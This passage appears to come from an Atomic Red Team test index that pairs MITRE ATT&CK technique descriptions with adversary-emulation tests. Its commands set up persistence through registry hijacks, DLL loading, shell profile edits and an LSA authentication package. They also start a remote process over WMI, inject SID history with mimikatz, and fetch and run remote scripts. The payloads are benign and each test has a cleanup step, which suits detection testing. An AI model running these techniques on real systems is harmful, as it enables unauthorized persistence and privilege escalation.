the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware
Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can
be proxied by an account with higher permissions, such as SYSTEM or service
accounts, an adversary may be able to abuse these triggered execution mechanisms
to escalate their privileges. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- SaaS
- IaaS
- Office Suite
x_mitre_version: '1.4'
identifier: T1546
atomic_tests:
- name: Persistence with Custom AutodialDLL
auto_generated_guid: aca9ae16-7425-4b6d-8c30-cad306fdbd5b
description: "The DLL pointed to by the AutodialDLL registry key is loaded every
time a process connects to the internet. Attackers can gain persistent code
execution by setting this key to a DLL of their choice. \n\nThe sample dll
provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping
a web browser such as MS Edge or Chrome should result in the dll executing.\n[Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)\n"
supported_platforms:
- windows
dependencies:
- description: 'AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
'
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll)
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"
executor:
command: 'Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters
-Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
'
cleanup_command: Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters
-Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll
name: powershell
elevation_required: true
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
description: |-
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
supported_platforms:
- windows
input_arguments:
command:
description: Command to Execute
type: string
default: notepad.exe
executor:
command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
-Name "AutoRun" -Value "#{command}" -PropertyType "String"
cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
Processor" -Name "AutoRun" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)
auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
description: |-
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
supported_platforms:
- windows
input_arguments:
command:
description: Command to Execute
type: string
default: notepad.exe
executor:
command: |-
$path = "HKCU:\Software\Microsoft\Command Processor"
if (!(Test-Path -path $path)){
New-Item -ItemType Key -Path $path
}
New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
Processor" -Name "AutoRun" -ErrorAction Ignore
name: powershell
- name: WMI Invoke-CimMethod Start Process
auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
description: |
The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
This is a novel way to perform lateral movement or to start a remote process.
This does require WinRM to be enabled. The account performing the run will also need to be elevated.
A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
supported_platforms:
- windows
input_arguments:
dest:
description: destination computer name
type: string
default: localhost
password:
description: password for account
type: string
default: P@ssword1
username:
description: account to use
type: string
default: Administrator
process:
description: process to spawn
type: string
default: calc.exe
executor:
name: powershell
elevation_required: true
command: "# Set the remote computer name and credentials\n $RemoteComputer
= \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
-AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
-ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
= New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
# Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
# Invoke the Create method on the Win32_Process class to start the process\n
$Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
-MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
the result\n if ($Result.ReturnValue -eq 0) {\n Write-Host \"Process
started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
\ Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
}\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
\n"
- name: Adding custom debugger for Windows Error Reporting
auto_generated_guid: 17d1a3cc-3373-495a-857a-e5dd005fb302
description: |
When applications hang, the Windows Error Reporting framework allows us to attach a debugger, if it is set up in the Registry.
Adding executable of choice will let the executable to auto-execute when during any application crash due to functioning of WER framework
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs"
/v Debugger /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f
'
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows\Windows Error
Reporting\Hangs" /v Debugger /f
'
name: command_prompt
elevation_required: true
- name: Load custom DLL on mstsc execution
auto_generated_guid: 2db7852e-5a32-4ec7-937f-f4e027881700
description: 'Adding ClxDllPath under Terminal Server Client subkey of HKLM
hive with a path to custom DLL allows for DLL loading during execution of
mstsc.exe
'
supported_platforms:
- windows
input_arguments:
dll_inf:
description: custom DLL to be executed
type: Path
default: C:\Windows\System32\amsi.dll
executor:
command: 'reg add "HKLM\SOFTWARE\Microsoft\Terminal Server Client" /v ClxDllPath
/t REG_SZ /d "#{dll_inf}" /f
'
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Terminal Server Client"
/v ClxDllPath /f '
name: command_prompt
elevation_required: true
- name: Persistence using automatic execution of custom DLL during RDP session
auto_generated_guid: b7fc4c3f-fe6e-479a-ba27-ef91b88536e3
description: "When remote desktop session is accepted, the system queries the
key it queries the Registry key:HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal
Server\\AddIns\\TestDVCPlugin. \nIf such key exists, the OS will attempt to
read the Path value underneath.Once the Path is read, the DLL that it points
to will be loaded via LoadLibrary."
supported_platforms:
- windows
executor:
command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin"
/v Path /t REG_SZ /d "C:\Windows\System32\amsi.dll" /f
cleanup_command: reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server\AddIns\TestDVCPlugin" /f
name: command_prompt
elevation_required: true
- name: Persistence via ErrorHandler.cmd script execution
auto_generated_guid: 547a4736-dd1c-4b48-b4fe-e916190bb2e7
description: |
Create persistence by triggering script within ErrorHandler.cmd upon the execution of specific binaries within the oobe directory.
Upon test execution, Setup.exe will be executed to further execute script within ErrorHandlercmd to launch Notepad.
supported_platforms:
- windows
dependencies:
- description: 'ErrorHandler.cmd script must exist on disk at specified at PathToAtomicsFolder\T1546\bin\ErrorHandler.cmd
'
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1546\src\ErrorHandler.cmd)
{ exit 0} else { exit 1}
'
get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\T1546\\src\\\"
-ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/src/ErrorHandler.cmd\"
-OutFile \"PathToAtomicsFolder\\T1546\\src\\ErrorHandler.cmd\" \n"
executor:
command: |
Copy-Item -Path PathToAtomicsFolder\T1546\src\ErrorHandler.cmd -Destination C:\Windows\Setup\Scripts\ErrorHandler.cmd
C:\windows\System32\oobe\Setup
cleanup_command: 'Remove-Item C:\Windows\Setup\Scripts\ErrorHandler.cmd '
name: powershell
elevation_required: true
- name: Persistence using STARTUP-PATH in MS-WORD
auto_generated_guid: f0027655-25ef-47b0-acaf-3d83d106156c
description: |-
When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\\Word\Options\STARTUP-PATH and if it exists,
it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
The registry key can be abused to load malware from the mentioned path. Reboot might be required.
supported_platforms:
- windows
executor:
command: reg add "HKCU\Software\Microsoft\Office\16.0\Word\Options" /v STARTUP-PATH
/t REG_SZ /d "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent"
/f
cleanup_command: reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options
/v STARTUP-PATH /f
name: command_prompt
elevation_required: true
T1546.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
created: '2020-01-24T14:13:45.936Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/004
external_id: T1546.004
- source_name: anomali-linux-rabbit
description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
Malware Out of a Hat. Retrieved December 17, 2020.
url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- source_name: anomali-rocke-tactics
description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
December 17, 2020.
url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- source_name: Linux manual bash invocation
description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
url: https://wiki.archlinux.org/index.php/Bash#Invocation
- source_name: ScriptingOSX zsh
description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
Files. Retrieved February 25, 2021.'
url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- source_name: bencane blog bashrc
description: Benjamin Cane. (2013, September 16). Understanding a little more
about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- source_name: macOS MS office sandbox escape
description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
Retrieved August 20, 2021.
url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- source_name: Magento
description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
Vector. Retrieved December 17, 2020.
url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- source_name: Tsunami
description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- source_name: PersistentJXA_leopitt
description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
for macOS. Retrieved January 11, 2021.
url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- source_name: code_persistence_zsh
description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
Retrieved January 11, 2021.
url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- source_name: ESF_filemonitor
description: Patrick Wardle. (2019, September 17). Writing a File Monitor
with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
url: https://objective-see.com/blog/blog_0x48.html
- source_name: intezer-kaiji-malware
description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
turning to Golang. Retrieved December 17, 2020.'
url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:15.960Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
execute several configuration scripts at different points throughout the session
based on events. For example, when a user opens a command-line interface or
remotely logs in (such as via SSH) a login shell is initiated. The login shell
executes scripts from the system (/etc) and the user’s home directory
(~/) to configure the environment. All login shells on a system
use /etc/profile when initiated. These configuration scripts run at the permission
level of their directory and are often used to set environment variables,
create aliases, and customize the user’s environment. When the shell exits
or terminates, additional shell scripts are executed to ensure the shell exits
appropriately. \n\nAdversaries may attempt to establish persistence by inserting
commands into scripts automatically executed by shells. Using bash as an example,
the default shell for most GNU/Linux systems, adversaries may add commands
that launch malicious binaries into the /etc/profile and /etc/profile.d
files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These
files typically require root permissions to modify and are executed each time
any shell on a system launches. For user level permissions, adversaries can
insert malicious commands into ~/.bash_profile, ~/.bash_login,
or ~/.profile which are sourced when a user opens a command-line
interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation:
Linux manual bash invocation) Since the system only executes the first existing
file in the listed order, adversaries have used ~/.bash_profile
to ensure execution. Adversaries have also leveraged the ~/.bashrc
file which is additionally executed if the connection is established remotely
or an additional interactive shell is opened, such as a new tab in the command-line
interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation:
Magento) Some malware targets the termination of a program to trigger execution,
adversaries can use the ~/.bash_logout file to execute malicious
commands at the end of a session. \n\nFor macOS, the functionality of this
technique is similar but may leverage zsh, the default shell for macOS 10.15+.
When the Terminal.app is opened, the application launches a zsh login shell
and a zsh interactive shell. The login shell configures the system environment
using /etc/profile, /etc/zshenv, /etc/zprofile,
and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation:
code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login
shell then configures the user environment with ~/.zprofile and
~/.zlogin. The interactive shell uses the ~/.zshrc
to configure the user environment. Upon exiting, /etc/zlogout
and ~/.zlogout are executed. For legacy programs, macOS executes
/etc/bashrc on startup."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Robert Wilson
- Tony Lambert, Red Canary
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '2.2'
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
description: 'Adds a command to the .bash_profile file of the current user
'
supported_platforms:
- macos
- linux
input_arguments:
command_to_add:
description: Command to add to the .bash_profile file
type: string
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
'
cleanup_command: |
head -n '-2' ~/.bash_profile > /tmp/T1546.004
mv /tmp/T1546.004 ~/.bash_profile
name: sh
- name: Add command to .bashrc
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
description: 'Adds a command to the .bashrc file of the current user
'
supported_platforms:
- macos
- linux
input_arguments:
command_to_add:
description: Command to add to the .bashrc file
type: string
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
'
cleanup_command: |
head -n '-2' ~/.bashrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.bashrc
name: sh
- name: Add command to .shrc
auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53
description: 'Adds a command to the .shrc file of the current user
'
supported_platforms:
- linux
input_arguments:
command_to_add:
description: Command to add to the .shrc file
type: string
default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004
executor:
command: 'echo ''#{command_to_add}'' >> ~/.shrc
'
cleanup_command: |
head -n '-2' ~/.shrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.shrc
name: sh
- name: Append to the system shell profile
auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b
description: 'An adversary may wish to establish persistence by executing malicious
commands from the systems /etc/profile every time "any" user logs in.
'
supported_platforms:
- linux
input_arguments:
text_to_append:
description: Text to append to the /etc/profile file
type: string
default: "# Hello from Atomic Red Team T1546.004"
executor:
elevation_required: true
name: sh
command: 'echo ''#{text_to_append}'' >> /etc/profile
'
cleanup_command: 'sed -i "s/# Atomic Red Team was here! T1546.004//" /etc/profile
'
- name: Append commands user shell profile
auto_generated_guid: bbdb06bc-bab6-4f5b-8232-ba3fbed51d77
description: 'An adversary may wish to establish persistence by executing malicious
commands from the users ~/.profile every time the "user" logs in.
'
supported_platforms:
- linux
input_arguments:
text_to_append:
description: Text to append to the ~/.profile file
type: string
default: "# Atomic Red Team was here... T1546.004"
executor:
elevation_required: false
name: sh
command: 'echo ''#{text_to_append}'' >> ~/.profile
'
cleanup_command: 'sed -i "s/# Atomic Red Team was here... T1546.004//" ~/.profile
'
- name: System shell profile scripts
auto_generated_guid: 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4
description: 'An adversary may wish to establish persistence by adding commands
into any of the script files in the /etc/profile.d/ directory, which are executed
every time "any" user logs in.
'
supported_platforms:
- linux
input_arguments:
text_to_append:
description: Text to append to the /etc/profile.d/bash_completion.sh file
type: string
default: "# Atomic Red Team was here... T1546.004"
executor:
elevation_required: true
name: sh
command: 'echo ''#{text_to_append}'' >> /etc/profile.d/bash_completion.sh
'
cleanup_command: 'sed -i "s/# Atomic Red Team was here... T1546.004//" /etc/profile.d/bash_completion.sh
'
- name: Create/Append to .bash_logout
auto_generated_guid: 37ad2f24-7c53-4a50-92da-427a4ad13f58
description: "The Bash shell runs ~/.bash_logout \"if it exists\" to run commands
on user logout. An adversary may create or append to a .bash_logout to clear
history, start processes etc. Note the ~/.bash_logout is only run if you explicitly
exit or log out of an \"interactive login shell session\" i.e. via the console,
SSH, /bin/bash -l or su -l . \n\nThis test creates the art user,
logs in, creates a .bash_logout which will echo some text into the art.txt
file on logout and logs out and the /home/art/art.txt is created.\n"
supported_platforms:
- linux
executor:
name: bash
elevation_required: true
command: |
useradd --create-home --shell /bin/bash art
su -l art -c "echo 'echo \"Atomic Red Team was here... T1546.004\" >> /home/art/art.txt' >> /home/art/.bash_logout; exit"
cleanup_command: 'userdel -fr art
'
T1134.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023
created: '2020-02-18T18:34:49.414Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/005
external_id: T1134.005
- source_name: Microsoft SID
description: Microsoft. (n.d.). Security Identifiers. Retrieved November 30,
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx
- source_name: Microsoft SID-History Attribute
description: Microsoft. (n.d.). Active Directory Schema - SID-History attribute.
Retrieved November 30, 2017.
url: https://msdn.microsoft.com/library/ms679833.aspx
- source_name: Microsoft Well Known SIDs Jun 2017
description: Microsoft. (2017, June 23). Well-known security identifiers in
Windows operating systems. Retrieved November 30, 2017.
url: https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems
- source_name: Microsoft Get-ADUser
description: Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved
November 30, 2017.
url: https://technet.microsoft.com/library/ee617241.aspx
- source_name: AdSecurity SID History Sept 2015
description: 'Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence
#14: SID History. Retrieved November 30, 2017.'
url: https://adsecurity.org/?p=1772
- source_name: Microsoft DsAddSidHistory
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
url: https://msdn.microsoft.com/library/ms677982.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:16.316Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Alain Homewood, Insomnia Security
- Vincent Le Toux
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1134.005
atomic_tests:
- name: Injection SID-History with mimikatz
auto_generated_guid: 6bef32e5-9456-4072-8f14-35566fb85401
description: 'Adversaries may use SID-History Injection to escalate privileges
and bypass access controls. Must be run on domain controller
'
supported_platforms:
- windows
input_arguments:
sid_to_inject:
description: SID to inject into sidhistory
type: string
default: S-1-5-21-1004336348-1177238915-682003330-1134
sam_account_name:
description: Target account to modify
type: string
default: "$env:username"
mimikatz_path:
description: Mimikatz windows executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
'
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item
-Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction
Ignore -Force | Out-Null\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\"
-UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl
= (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url
| where-object { $_.endswith(\".zip\") }\n$mimikatz_exe = cmd /c echo #{mimikatz_path}\n$basePath
= Split-Path $mimikatz_exe | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\"
$basePath\n"
executor:
name: command_prompt
elevation_required: true
command: '#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject}
/sam:#{sam_account_name}" "exit"
'
cleanup_command: '#{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"
'
T1548.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0
created: '2020-01-30T14:40:20.187Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/004
external_id: T1548.004
- source_name: AppleDocs AuthorizationExecuteWithPrivileges
description: Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges.
Retrieved August 8, 2019.
url: https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg
- source_name: Carbon Black Shlayer Feb 2019
description: Carbon Black Threat Analysis Unit. (2019, February 12). New macOS
Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.
url: https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html
- source_name: Death by 1000 installers; it's all broken!
description: Patrick Wardle. (2017). Death by 1000 installers; it's all broken!.
Retrieved August 8, 2019.
url: https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8
- source_name: OSX Coldroot RAT
description: Patrick Wardle. (2018, February 17). Tearing Apart the Undetected
(OSX)Coldroot RAT. Retrieved August 8, 2019.
url: https://objective-see.com/blog/blog_0x2A.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:16.860Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to
give application developers an easy way to perform operations with root privileges,
such as for application installation or updating. This API does not validate
that the program requesting root privileges comes from a reputable source
or has been maliciously modified. \n\nAlthough this API is deprecated, it
still fully functions in the latest releases of macOS. When calling this API,
the user will be prompted to enter their credentials but no checks on the
origin or integrity of the program are made. The program calling the API may
also load world writable files which can be modified to perform malicious
behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges
to obtain root privileges in order to install malicious software on victims
and install persistence mechanisms.(Citation: Death by 1000 installers; it's
all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot
RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036)
to trick the user into granting escalated privileges to malicious code.(Citation:
Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer
Feb 2019) This technique has also been shown to work by modifying legitimate
programs present on the machine that make use of this API.(Citation: Death
by 1000 installers; it's all broken!)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jimmy Astle, @AstleJimmy, Carbon Black
- Erika Noerenberg, @gutterchurl, Carbon Black
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1547.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec
created: '2020-01-24T14:54:42.757Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/002
external_id: T1547.002
- source_name: Graeber 2014
description: Graeber, M. (2014, October). Analysis of Malicious Security Support
Provider DLLs. Retrieved March 1, 2017.
url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
- source_name: Microsoft Configure LSA
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
url: https://technet.microsoft.com/en-us/library/dn408187.aspx
- source_name: MSDN Authentication Packages
description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1,
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:17.208Z'
name: Authentication Package
description: |-
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1547.002
atomic_tests:
- name: Authentication Package
auto_generated_guid: be2590e8-4ac3-47ac-b4b5-945820f2fbe9
description: |
Establishes persistence using a custom authentication package for the Local Security Authority (LSA).
After a reboot, Notepad.exe will be executed as child process of lsass.exe.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.002/package
[Related blog](https://pentestlab.blog/2019/10/21/persistence-security-support-provider/)
supported_platforms:
- windows
executor:
command: |
Copy-Item "$PathToAtomicsFolder\T1547.002\bin\package.dll" C:\Windows\System32\
